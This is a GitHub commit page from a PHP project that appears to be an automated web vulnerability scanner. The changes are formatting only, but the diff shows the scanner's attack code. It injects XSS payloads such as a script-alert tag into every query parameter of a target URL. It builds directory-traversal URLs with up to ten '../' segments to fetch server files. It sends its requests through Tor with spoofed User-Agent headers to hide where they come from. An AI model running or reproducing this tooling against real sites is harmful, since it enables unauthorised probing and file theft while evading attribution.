Skip to content

Commit

Permalink
fix cs - psr
Browse files Browse the repository at this point in the history
  • Loading branch information
@leonnleite
leonnleite committed Oct 19, 2016
1 parent e7785f9 commit c49d1b5
Show file tree
Hide file tree
Showing 10 changed files with 143 additions and 156 deletions.
5 changes: 2 additions & 3 deletions src/CommandDataConfig.php
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,13 +12,13 @@ abstract class CommandDataConfig
'tor' => false,
'torl' => false,
'virginProxies' => false,
'proxyOfSites' => false
'proxyOfSites' => false,
];

public function __construct(array $commandData)
{
$this->commandData = array_merge($this->defaultCommandData, $commandData);

if ($this->commandData['torl']) {
$this->commandData['tor'] = $this->commandData['torl'];
}
Expand All @@ -29,4 +29,3 @@ public function output($value)
echo $value;
}
}

62 changes: 30 additions & 32 deletions src/CrossSiteScripting.php
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,14 +2,13 @@

namespace Aszone\Vulnerabilities;

use Respect\Validation\Validator as v;
use Aszone\FakeHeaders\FakeHeaders;
use GuzzleHttp\Client;

class CrossSiteScripting extends CommandDataConfig implements VulnerabilityScanner
{
const EXPLOIT1 = "<script>alert(aaabbbccc);</script>";
const EXPLOIT2 = "<h1>aaabbbccc</h1>";
const EXPLOIT1 = '<script>alert(aaabbbccc);</script>';
const EXPLOIT2 = '<h1>aaabbbccc</h1>';
const EXPLOIT1REGEX = "<script>alert\(aaabbbccc\);<\/script>";
const EXPLOIT2REGEX = "<h1>aaabbbccc<\/h1>";

Expand All @@ -32,9 +31,9 @@ public function isXssPossible($target)
public function verify($target)
{
$urls = $this->generateUrls($target);

$this->output("\n");

foreach ($urls as $url) {
if ($this->attack($url)) {
$this->output('Is Vull');
Expand All @@ -54,13 +53,13 @@ public function attack($url)
$client = new Client(['defaults' => [
'headers' => ['User-Agent' => $header->getUserAgent()],
'proxy' => $this->commandData['tor'],
'timeout' => 30
'timeout' => 30,
]]);

try {
$body = $client->get($url)->getBody()->getContents();

if ($body && $this->checkSuccess($body) && ! $this->checkError($body)) {
if ($body && $this->checkSuccess($body) && !$this->checkError($body)) {
return true;
}
} catch (\Exception $e) {
Expand All @@ -70,43 +69,43 @@ public function attack($url)
return false;
}

public function checkSuccess($body)
public function checkSuccess($body)
{
return (bool) preg_match("/" . static::EXPLOIT1REGEX . "|" . static::EXPLOIT2REGEX . "/", $body);
return (bool) preg_match('/'.static::EXPLOIT1REGEX.'|'.static::EXPLOIT2REGEX.'/', $body);
}

public function generateUrls($target)
{
$this->output("\n" . $target);
$this->output("\n".$target);

$urls1 = $this->generateUrlsByExploit($target, static::EXPLOIT1);
$urls2 = $this->generateUrlsByExploit($target, static::EXPLOIT2);

return array_merge($urls1, $urls2);
}

public function generateUrlsByExploit($target, $exploit)
{
$explodeUrl = parse_url($target);
$explodeUrl = parse_url($target);
$explodeQuery = explode('&', $explodeUrl['query']);

if (! isset($explodeUrl['query'])) {
if (!isset($explodeUrl['query'])) {
return [];
}

$wordsValue = [];

foreach ($explodeQuery as $query) {
$explodeQueryEqual = explode('=', $query);
$wordsValue[$explodeQueryEqual[0]] = "";
$wordsValue[$explodeQueryEqual[0]] = '';

if (isset($explodeQueryEqual[1])) {
$wordsValue[$explodeQueryEqual[0]] = $explodeQueryEqual[1];
}
}

foreach ($wordsValue as $keyValue => $value) {
$urls[] = str_replace($keyValue . "=" . $value, $keyValue . "=" . $exploit, $target);
$urls[] = str_replace($keyValue.'='.$value, $keyValue.'='.$exploit, $target);
}

return $urls;
Expand All @@ -115,7 +114,7 @@ public function generateUrlsByExploit($target, $exploit)
public function checkError($body)
{
$errors = $this->getErrors();

foreach ($errors as $error) {
$isValid = strpos($body, $error);

Expand All @@ -129,7 +128,7 @@ public function checkError($body)

protected function getErrors()
{
if (! $this->errors) {
if (!$this->errors) {
$this->loadErrors();
}

Expand All @@ -138,23 +137,22 @@ protected function getErrors()

protected function loadErrors()
{
$errorsMysql = parse_ini_file(__DIR__ . '/../resources/Errors/mysql.ini');
$errorsMariaDb = parse_ini_file(__DIR__ . '/../resources/Errors/mariadb.ini');
$errorsOracle = parse_ini_file(__DIR__ . '/../resources/Errors/oracle.ini');
$errorssqlServer = parse_ini_file(__DIR__ . '/../resources/Errors/sqlserver.ini');
$errorsPostgreSql = parse_ini_file(__DIR__ . '/../resources/Errors/postgresql.ini');
$errorsAsp = parse_ini_file(__DIR__ . '/../resources/Errors/asp.ini');
$errorsPhp = parse_ini_file(__DIR__ . '/../resources/Errors/php.ini');
$errorsMysql = parse_ini_file(__DIR__.'/../resources/Errors/mysql.ini');
$errorsMariaDb = parse_ini_file(__DIR__.'/../resources/Errors/mariadb.ini');
$errorsOracle = parse_ini_file(__DIR__.'/../resources/Errors/oracle.ini');
$errorssqlServer = parse_ini_file(__DIR__.'/../resources/Errors/sqlserver.ini');
$errorsPostgreSql = parse_ini_file(__DIR__.'/../resources/Errors/postgresql.ini');
$errorsAsp = parse_ini_file(__DIR__.'/../resources/Errors/asp.ini');
$errorsPhp = parse_ini_file(__DIR__.'/../resources/Errors/php.ini');

$this->errors = array_merge(
$errorsMysql,
$errorsMariaDb,
$errorsOracle,
$errorssqlServer,
$errorsMysql,
$errorsMariaDb,
$errorsOracle,
$errorssqlServer,
$errorsPostgreSql,
$errorsAsp,
$errorsPhp
$errorsPhp
);
}
}

30 changes: 14 additions & 16 deletions src/LocalFileDownload.php
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,6 @@

namespace Aszone\Vulnerabilities;

use Respect\Validation\Validator as v;
use Aszone\FakeHeaders\FakeHeaders;
use GuzzleHttp\Client;

Expand Down Expand Up @@ -56,7 +55,7 @@ protected function attack($url)
$client = new Client(['defaults' => [
'headers' => ['User-Agent' => $header->getUserAgent()],
'proxy' => $this->commandData['tor'],
'timeout' => 30
'timeout' => 30,
]]);

try {
Expand All @@ -73,16 +72,16 @@ public function generateUrls($target)
$this->output("\n".$target);

$parts = parse_url($target);
if (! isset($parts['path'])) {

if (!isset($parts['path'])) {
return [];
}

$ext = $this->getExtension($parts['path']);

$urlsIndex = $this->generateUrlsByExploit($target, 'index.' . $ext);
$urlsPath = $this->generateUrlsByExploit($target, $parts['path']);
$urlsIndex = $this->generateUrlsByExploit($target, 'index.'.$ext);
$urlsPath = $this->generateUrlsByExploit($target, $parts['path']);

return array_merge($urlsPath, $urlsIndex);
}

Expand All @@ -93,15 +92,15 @@ public function generateUrlsByExploit($target, $exploit)

foreach ($explodeQuery as $keyQuery => $query) {
$explodeQueryEqual = explode('=', $query);
$wordsValue[$explodeQueryEqual[0]] = "";
$wordsValue[$explodeQueryEqual[0]] = '';

if ($explodeQueryEqual[1]) {
$wordsValue[$explodeQueryEqual[0]] = $explodeQueryEqual[1];
}
}

foreach ($wordsValue as $keyValue => $value) {
$urls[] = str_replace($keyValue . "=" . $value, $keyValue . "=??????????", $target);
$urls[] = str_replace($keyValue.'='.$value, $keyValue.'=??????????', $target);
}

$urlFinal = [];
Expand All @@ -111,8 +110,8 @@ public function generateUrlsByExploit($target, $exploit)

$breakFolder = '../';

for ($i = 1;$i <= 10;++$i) {
$urlFinal[] = str_replace('??????????', $breakFolder . $exploit, $url);
for ($i = 1; $i <= 10; ++$i) {
$urlFinal[] = str_replace('??????????', $breakFolder.$exploit, $url);
$breakFolder .= '../';
}
}
Expand All @@ -123,12 +122,11 @@ public function generateUrlsByExploit($target, $exploit)
protected function getExtension($path)
{
$isValidExt = preg_match("/\.(.*)/", $path, $matches);

if ($isValidExt) {
return $matches[1];
}

return false;
}
}

Loading

0 comments on commit c49d1b5

Please sign in to comment.